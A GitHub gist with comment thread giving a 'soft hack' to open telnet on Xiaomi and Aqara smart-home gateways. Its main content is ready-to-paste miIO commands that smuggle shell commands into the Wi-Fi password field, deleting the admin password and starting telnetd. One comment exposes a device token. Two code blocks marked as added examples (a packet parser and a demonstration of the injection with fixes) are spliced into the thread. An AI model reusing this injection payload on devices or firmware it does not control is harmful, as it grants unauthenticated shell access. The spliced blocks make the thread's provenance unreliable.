zvldz/soft_hack.md

Last active Jun 11, 2021

Soft hack to open telnet

You need a Gateway 3 (mgl03) connected to MiHome, and also the gateway's IP address and token.

1 way (recommended)

Via XiaomiGateway3 component.

Enter the following in the 'Open Telnet command' field (as it is, without changing anything):

{"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}

2 way (recommended if not using Home Assistant)

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'

3 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}'

Login: admin

Password is empty

After opening telnet, it is better to install custom firmware (only for Xiaomi Gateway 3 mgl03).

Read here: https://github.com/zvldz/mgl03_fw/tree/main/firmware#the-easy-way

Open telnet command should also work with:

  • lumi.gateway.mgl03 - Mi Smart Home Hub
  • lumi.gateway.acn01 - Aqara Hub M1S CN
  • lumi.gateway.aeu01 - Aqara Hub M1S EU
  • lumi.aircondition.acn05 - Aqara Air Conditioning Controller P3
  • lumi.gateway.sacn01 - Smart USB Wall Outlet Hub

Aqara Hub E1 (ZHWG16LM usb stick)

You need a Gateway E1 connected to MiHome, and also the gateway's IP address and token.

1 way

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; /bin/riu_w 101e 53 3012; telnetd"}}'

2 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ;  /bin/riu_w 101e 53 3012 ; telnetd"}'

Login: root

Password is empty

I am not the author; I just tested, improved and published it.

@patrickgmail patrickgmail commented Mar 1, 2021

@obs945 obs945 commented Mar 8, 2021

If someone is using Aqara Air Conditioning Controller P3 (lumi.aircondition.acn05) and opened telnet, please don't install custom firmware.
This morning I successfully installed custom firmware and my P3 cannot operate anymore.
Aqara customer service also told me the device cannot be repaired by ourselves.
So, please don't install custom firmware.

@HomeAssistantGouveiaRicardo HomeAssistantGouveiaRicardo commented Mar 11, 2021

{"method":"set_ip_info","params":{"ssid":"""","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}
Am I supposed to put my ssid and password here?
Replace "ssid" and "pswd" ?

Owner Author

@zvldz zvldz commented Mar 12, 2021

> Replace "ssid" and "pswd" ?

The command must be executed as is, without changing anything.

@HomeAssistantGouveiaRicardo HomeAssistantGouveiaRicardo commented Mar 12, 2021

Thanks a lot :) The devices and entities have been discovered.
Now I have a problem that the entities become unavailable sometimes....

@zvldz zvldz commented Mar 12, 2021

You should try the master version of the component.

@ZhiMingChang ZhiMingChang commented Mar 13, 2021

help
lumi.gateway.mgl03 - Mi Smart Home Hub
Via XiaomiGateway3 component fail.
2021-03-13 16:54:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:55:14 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:55:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:56:14 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:56:14 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:57:15 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:57:15 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:57:19 DEBUG gateway3 192.168.0.107 | Start main thread
2021-03-13 16:57:19 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:58:16 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:58:18 DEBUG gateway3 192.168.0.107 | Stop main thread
2021-03-13 16:58:20 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:58:20 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:59:04 DEBUG gateway3 192.168.0.107 | Start main thread
2021-03-13 16:59:04 DEBUG gateway3 192.168.0.107 | Prepare Gateway
2021-03-13 16:59:21 DEBUG gateway3 192.168.0.107 | Can't read devices: telnet connection closed
2021-03-13 16:59:23 DEBUG gateway3 192.168.0.107 | Stop main thread

@zvldz zvldz commented Mar 13, 2021

Check ip and token.

@mumukiller mumukiller commented Mar 16, 2021

Does not work either. Use lumi.gateway.mgl03. Any ideas which logs can help me to understand what's working wrong?

@zvldz zvldz commented Mar 16, 2021

> Any ideas which logs can help me to understand what's working wrong?

How did you try to open the telnet?
If you used Home Assistant, you need to look at the logs.

@zvldz zvldz commented Mar 16, 2021

You can also try the latest (today's) master version of the component for HA. Extended error messages appeared there.

@zvldz zvldz commented Mar 16, 2021

Also, the gateway must be connected to MiHome.

@mumukiller mumukiller commented Mar 17, 2021

@zvldz the gateway is connected to MiHome. I reinstalled HA today and all related components - hacs and xiaomi gateway 3 integration. I'm trying to open it via telnet as suggested https://gist.github.com/zvldz/1bd6b21539f84339c218f9427e022709#1-way-recommended

That's all I have in the logs

You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
15:55:17 – loader.py (WARNING)
2021-03-17 15:55:11 WARNING (MainThread) [homeassistant.loader] You are using a custom integration hacs which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
2021-03-17 15:55:17 WARNING (MainThread) [homeassistant.loader] You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant

The gateway was discovered using the mi home integration; I can check its token, mac, etc., but I am not able to add it using the suggested way

@zvldz zvldz commented Mar 18, 2021

Maybe you are entering the command incorrectly. Also, it is only the first lines of the log, without opening the telnet.
Install the master version of the component.
Find the component in hacs, select reinstall, then select master.

@Arthanfel Arthanfel commented Mar 18, 2021

> @zvldz the gateway is connected to MiHome. I reinstalled HA today and all related components - hacs and xiaomi gateway 3 integration. I'm trying to open it via telnet as suggested https://gist.github.com/zvldz/1bd6b21539f84339c218f9427e022709#1-way-recommended
>
> That's all I have in the logs
>
> You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
> 15:55:17 – loader.py (WARNING)
> 2021-03-17 15:55:11 WARNING (MainThread) [homeassistant.loader] You are using a custom integration hacs which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
> 2021-03-17 15:55:17 WARNING (MainThread) [homeassistant.loader] You are using a custom integration xiaomi_gateway3 which has not been tested by Home Assistant. This component might cause stability problems, be sure to disable it if you experience issues with Home Assistant
>
> The gateway was discovered using the mi home integration; I can check its token, mac, etc., but I am not able to add it using the suggested way

Hello guys, apparently I do have the exact same problem.

My Gateway is a V3 with S/N ZNDMWG03LM
Firmware is 1.4.7_0115

At first I had to define my router as a repeater so that I would "see" it as part of the same network of my ISP "box" (french ISP routers seem to appear a tad problematic).
Now I can see it in the Gateway 3 component integration, but only this one, no child device.

Reinstalled everything through HACS, but still the same problem...

@zvldz zvldz commented Mar 18, 2021

I can't understand what the problem is.
You obviously have something wrong with it.
Wait for new version of the component for HA.

@mumukiller mumukiller commented Mar 18, 2021

I have reinstalled component using master branch.
Now I see in the logs

2021-03-18 15:12:54 WARNING (MainThread) [custom_components.xiaomi_gateway3.core.mini_miio] 10.100.10.8 | Device offline

That's weird because I can open the gateway settings using the mi home application

@zvldz zvldz commented Mar 18, 2021

MiHome communicates with the gateway through the cloud.
You need to check your LAN settings. The devices most likely cannot communicate with each other.

@mumukiller mumukiller commented Mar 18, 2021

It's not that case. The gateway is available from the server where HA is located. It can be pinged and a route can be discovered

@mumukiller mumukiller commented Mar 18, 2021

So I decided to reset the gateway and add it again to mi home. I have some kind of progress here :)

Wrong Mi Home token

@mumukiller mumukiller commented Mar 18, 2021

And it works!!!

  1. Reset xiaomi gateway
  2. Add it to mi home
  3. Reload xiaomi mi home component in order to get a new token
  4. It works!

@zvldz thank you!!!

@Arthanfel Arthanfel commented Mar 18, 2021

> And it works!!!
>
>   1. Reset xiaomi gateway
>   2. Add it to mi home
>   3. Reload xiaomi mi home component in order to get a new token
>   4. It works!
>
> @zvldz thank you!!!

New step, thanks a lot.
I had to redo the thing thrice, and now it works neatly! Thanks a lot @mumukiller and @zvldz ;)

@designerferro designerferro commented Apr 3, 2021

Hey,

Great job here.

Got a glitch at the end, after getting telnet access:

  • Zigbee sensors no longer available.

After I got the telnet access and connected the Gateway (GW) to HASS, all my ZigBee sensors (3 motion and 1 window/door sensor) stopped communicating with the GW. Only my BLE devices were showing (3 temperature/humidity and 1 kettle)

I didn't worry too much and removed everything from HASS and Mi App. Got the GW back in the app and my BLE devices came back. This time I didn't integrate with HASS just yet and tried to pair the Zigbee devices with the GW. After 60 seconds the app says it failed.

Got the GW integrated with HASS and, again, got telnet access in integration.

Now, if i telnet to the GW, I can watch the logs going about some issues via tail -f /var/log/messages:
Apr 3 19:27:33 rlxlinux user.info <GW>: 6816 sendToCloud:to agent:{"_to":16,"id":1804289384,"method":"local.query_dev","params":{}} -- cloud/mi/cloud_interface_xiaomi.cpp:193
This keeps showing up in the GW.

Still at the GW, via telnet, I can also watch what is going on at the MQTT by subscribing to the "#" feed mosquitto_sub -t "#". I can see the GW go about the BLE devices, publishing the information gathered to the feed.

What I don't know is how to follow the ZigBee process like I do for the MQTT broker or the logs.

I found the Zigbee things at the GW by find / -name "zigbee*", but, unfortunately, I have no idea how to use this:

/bin/zigbee_agent
/bin/zigbee_inter_bootloader.sh
/bin/zigbee_reset.sh
/data/zigbee
/data/factory/zigbee_device_lumi.4cf8cdf3c74c8ba
/data/factory/zigbee_devices.conf
/data/zigbee_gw
/usr/app/bin/zigbee_gw
/usr/app/conf/zigbee_agent.conf
/usr/app/conf/zigbee_gw
/usr/app/conf/zigbee_gw.conf
/var/zigbee_gw.pid

So this is it. I got the GW connected to HASS, but lost the Zigbee communication gateway to the Zigbee devices. :(

@designerferro designerferro commented Apr 5, 2021

UPDATE: Today, after coming home from work and having done nothing to the Mi Gateway, It paired with my sensors, and I still have Telnet access...

@sthorley sthorley commented Apr 6, 2021

FYI for any future readers. In Home Assistant, when adding the Gateway using the Xiaomi Gateway 3 integration, it is not necessary to use the commands above. The pre-filled command (shorter with generic text) is all that's needed. No need to copy paste from here.

@zvldz zvldz commented Apr 6, 2021

> it not necessary to use the commands above

You are wrong.

@sthorley sthorley commented Apr 6, 2021

> > it not necessary to use the commands above
>
> you are wrong.

Please test the use case first.

I appreciate the work that has been put into this code however when using this in the scenario I described (Home-Assistant, Xiaomi Gateway 3 Integration via GUI) these commands did not need to be copy pasted. The pre-filled text in the Open Telnet command field: {"method":"enable_telnet_service","params":""} worked on my version v1.4.7_0160 gateway while my initial attempt replacing this with the text above (Option 1) did not.

Perhaps AlexxIT has changed the default telnet open command recently?

@zvldz zvldz commented Apr 6, 2021

Are you using the stock version 1.4.7_0160 ?
AlexxIT uses only the standard command to open the telnet.

@sthorley sthorley commented Apr 6, 2021

> Are you using the stock version 1.4.7_0160 ?
> AlexxIT uses only the standard command to open the telnet.

Yes stock v1.4.7_160. It had only been updated from v1.4.6_040 about 5 minutes before and I’d tried the standard command on the 1.4.6_040 version which gave an error. Perhaps some of it had persisted and that’s why it worked?
I’m not certain how it works (if the changes made by the integration allow for standard telnet after first connection) but I currently have the telnet connected on a v1.4.7_160 gateway with the integration set to use the standard command not the one in the first post.


@zvldz zvldz commented Apr 6, 2021

> Yes stock v1.4.7_160. It had only been updated from v1.4.6_040 about 5 minutes before and I’d tried the standard command on the 1.4.6_040 version which gave an error. Perhaps some of it had persisted and that’s why it worked?

Did you upgrade from v1.4.6_040 to v1.4.7_160 via MiHome ?
In any case, to get the telnet on firmware 1.4.7 you need a magic command, if it is not a modified firmware.

@sthorley sthorley commented Apr 6, 2021

> Did you upgrade from v1.4.6_040 to v1.4.7_160 via MiHome ?

Yes. I have a second gateway which I can test on so I'll try this process again and confirm.

@sebas1986 sebas1986 commented Apr 10, 2021

Hello all! I've added the Xiaomi Gateway 3 integration, used the Cloud Xiaomi account User and Password but when I click Options I get: "No devices in account". I've got Xiaomi Home app on my iPhone properly working, with my gateway v3 set and some sensor associated and working. Any Idea? Many thanks

Sebastian

@zvldz zvldz commented Apr 10, 2021

> Any Idea?

You'd better ask this question here - https://github.com/AlexxIT/XiaomiGateway3

@smougenot smougenot commented Apr 12, 2021

Works fine ... thank you very much 👏 👏 👏

  • firmware 1.4.7_160
  • command way 1

@jamesht1 jamesht1 commented Apr 18, 2021

My gateway 3 is on firmware 1.4.7_160.
Where do I execute this command?
{"method":"set_ip_info","params":{"ssid":"""","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}

@xels2 xels2 commented Apr 27, 2021

Gateway 3, firmware 1.4.7_0160.
Way 1 didn't work for me.
Way 2 worked with this command from cmd (php on Windows 10):
php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd "{'id':130,'method':'set_ip_info','params':{'ssid':'\'\'','pswd':'123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd'}}"

Pay attention to the quotes.

@thejonesyboy thejonesyboy commented May 6, 2021

@zvldz thank you for your contribution. I could not get 'way 2' or 'way 3' working. Running Windows 10, with php and python installed and dependencies configured correctly.

device
Aqara Hub M1S CN ZHWG15LM

first steps
I switched the hub to Mijia (Mi Home) mode using the 'press button 10 times and then 2 times' method. I then added the hub to the Mi Home app using the China mainland region. (This was a painful process that failed many times before it finally worked). Then I used token_extractor.exe from https://github.com/PiotrMachowski/Xiaomi-cloud-tokens-extractor to extract my token from the 'cn' server.

way 2
command:
php miio-cli.php --ip 192.168.1.136 --token 736b3730545234587265356c49315750 --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'
result:
Устройство 192.168.1.136 не доступно или не отвечает.
result (translated):
Device 192.168.1.136 is not available or is not responding.

Although, the device is discoverable using command:
php miio-cli.php --discover 192.168.1.136 --debug
result:

array(2) {
  ["discover"]=>
  string(13) "192.168.1.136"
  ["debug"]=>
  bool(false)
}
Поиск 192.168.1.136
Соединение с устройством IP 192.168.1.136
Статус отладки [1]
Сокет успешно создан

Проверяем доступность устройства 192.168.1.136
Параметр SO_RCVTIMEO сокета успешно задан
 >>>>> Отправляем hello-пакет на 192.168.1.136 с таймаутом 5
 >>>>> Отправлено в сокет 32 байт
 <<<<< Получен ответ от IP 192.168.1.136 с порта 54321
Прочитано 32 байта из сокета
magic: 2131
length: 0020 --> 32 байт
unknown1: 00000000
devicetype: 185d
serial: ceb0
ts: 6093ee8a --> 1620307594 секунд --> 2021-05-06 13:26:34
checksum: ffffffffffffffffffffffffffffffff
ts_server: 6093ee8b --> 1620307595 секунд --> 2021-05-06 13:26:35
timediff: -1
Поиск выполнен.
Устройство найдено и отвечает.

result (translated):

array (2) {
  ["discover"] =>
  string (13) "192.168.1.136"
  ["debug"] =>
  bool (false)
}
Search 192.168.1.136
Connection with IP 192.168.1.136 device
Debug status [1]
Socket created successfully

Checking the availability of device 192.168.1.136
SO_RCVTIMEO socket option set successfully
 >>>>> Sending a hello packet to 192.168.1.136 with a timeout of 5
 >>>>> 32 bytes sent on socket
 <<<<< Received response from IP 192.168.1.136 from port 54321
Read 32 bytes from socket
magic: 2131
length: 0020 -> 32 bytes
unknown1: 00000000
devicetype: 185d
serial: ceb0
ts: 6093ee8a -> 1620307594 seconds -> 2021-05-06 13:26:34
checksum: fffffffffffffffffffffffffffffffff
ts_server: 6093ee8b -> 1620307595 seconds -> 2021-05-06 13:26:35
timediff: -1
Search completed.
The device is found and responds.

@zvldz I have a question for way 2: what does "You may need to change id." mean?

way 3
command:
miiocli device --ip 192.168.1.136 --token 736b3730545234587265356c49315750 raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}'
result:

Running command raw_command
Error: Unable to discover the device 192.168.1.136

Although (again), the device is discoverable using command:

miiocli discover

INFO:miio.miioprotocol:Sending discovery to <broadcast> with timeout of 5s..
INFO:miio.miioprotocol:  IP 192.168.1.136 (ID: 185dceb0) - token: b'ffffffffffffffffffffffffffffffff'
INFO:miio.miioprotocol:Discovery done

@zvldz I have a question for way 3: what does "maybe problem with sequence id" mean?
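
The 32-byte hello reply that the php-miio debug output above prints field by field, as an added example (not part of the original comment, and not php-miio or python-miio code): a parser that validates the header before trusting any field, run on a sample packet constructed from the values in that dump. The function and key names are hypothetical.

```python
import struct
from datetime import datetime, timezone

MIIO_MAGIC = 0x2131
# magic, length, unknown1, devicetype, serial, ts, checksum = 32 bytes, big-endian
HEADER = struct.Struct(">HHIHHI16s")

# Constructed sample: the reply rebuilt from the field values in the dump above.
SAMPLE_REPLY = bytes.fromhex(
    "21310020" "00000000" "185dceb0" "6093ee8a" + "ff" * 16
)


def parse_hello_reply(data):
    """Parse and validate a miIO hello reply; raise ValueError on a bad header."""
    if len(data) < HEADER.size:
        raise ValueError(f"short packet: {len(data)} bytes")
    magic, length, unknown1, devicetype, serial, ts, checksum = HEADER.unpack_from(data)
    if magic != MIIO_MAGIC:
        raise ValueError(f"bad magic: {magic:04x}")
    if length != len(data):
        raise ValueError(f"length field {length} != datagram size {len(data)}")
    return {
        # python-miio prints devicetype+serial together as the device ID
        "device_id": f"{devicetype:04x}{serial:04x}",
        "unknown1": unknown1,
        "ts": ts,
        # same interpretation of ts as the php-miio dump (seconds since epoch)
        "ts_utc": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        # python-miio labels this field "token"; all 0xff, as in both dumps
        # above, means the reply does not carry the device token
        "checksum_is_placeholder": checksum == b"\xff" * 16,
        "checksum_hex": checksum.hex(),
    }


if __name__ == "__main__":
    for key, value in parse_hello_reply(SAMPLE_REPLY).items():
        print(f"{key}: {value}")
```

A reply whose checksum field is not a placeholder is worth a closer look when inventorying miIO devices on a LAN, since python-miio reports that field as the token.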

@xels2 xels2 commented May 11, 2021

@thejonesyboy
In way 2 "You may need to change id." means that each time you execute the command you need to change the id by adding one to it. The first request with id 123, the second with 124, and so on.

@edtorrealba edtorrealba commented May 27, 2021

> And it works!!!
>
>   1. Reset xiaomi gateway
>   2. Add it to mi home
>   3. Reload xiaomi mi home component in order to get a new token
>   4. It works!
>
> @zvldz thank you!!!

Hi All! This method works perfectly for me. I have 1.4.6_0043

@mpsOxygen mpsOxygen commented Jun 2, 2021

Hello,

Great work! I am trying to understand how this little firmware works, from what I can tell your soft hack calls /bin/reset_wifi_info.sh "" 123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd . But I cannot find where you found the set_ip_info method. Would you mind sharing how you found it or at least pointing me in the right direction?

Thank you!

@zvldz zvldz commented Jun 3, 2021

> Would you mind sharing how you found it or at least pointing me in the right direction?

on gw in file /bin/zigbee_gw :)
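
The mechanism discussed in the two comments above, as an added example (not code from the gist or from the gateway firmware): it assumes, as the question suggests, that the firmware pastes the `ssid` and `pswd` fields into a command line for `/bin/reset_wifi_info.sh`, and uses Python's `shlex` to show how a shell splits that line, next to two ways of keeping the fields as data. The function names are hypothetical and nothing is executed.

```python
import json
import shlex

# Script path as quoted in the comment above. The three builders below are
# hypothetical stand-ins for firmware code (assumption), not taken from it.
SCRIPT = "/bin/reset_wifi_info.sh"
CONTROL_OPERATORS = {";", "&", "&&", "|", "||"}

# Request body copied from the gist ("1 way").
REQUEST = r'''{"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'''


def unsafe_command_line(params):
    """Vulnerable pattern: fields pasted into a string that a shell will parse."""
    return f"{SCRIPT} {params['ssid']} {params['pswd']}"


def quoted_command_line(params):
    """Mitigation when a shell cannot be avoided: quote every field."""
    fields = (params["ssid"], params["pswd"])
    return " ".join([SCRIPT] + [shlex.quote(f) for f in fields])


def argv_without_shell(params):
    """Preferred fix: an argument vector for an exec-style call, no shell at all."""
    return [SCRIPT, params["ssid"], params["pswd"]]


def commands_seen_by_shell(cmdline):
    """Tokenise like a POSIX shell (nothing is executed) and split the
    tokens into separate commands at each control operator."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    params = json.loads(REQUEST)["params"]
    for label, line in (("concatenated", unsafe_command_line(params)),
                        ("quoted", quoted_command_line(params))):
        cmds = commands_seen_by_shell(line)
        print(f"{label}: {len(cmds)} command(s)")
        for cmd in cmds:
            print("   ", cmd)
    print("argv:", argv_without_shell(params))
```

With concatenation the shell sees four commands; with quoting or an argument vector the whole `pswd` value stays a single argument to the script.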

@mpsOxygen mpsOxygen commented Jun 4, 2021

Thank you. I was only looking at miio_client & miio_agent.
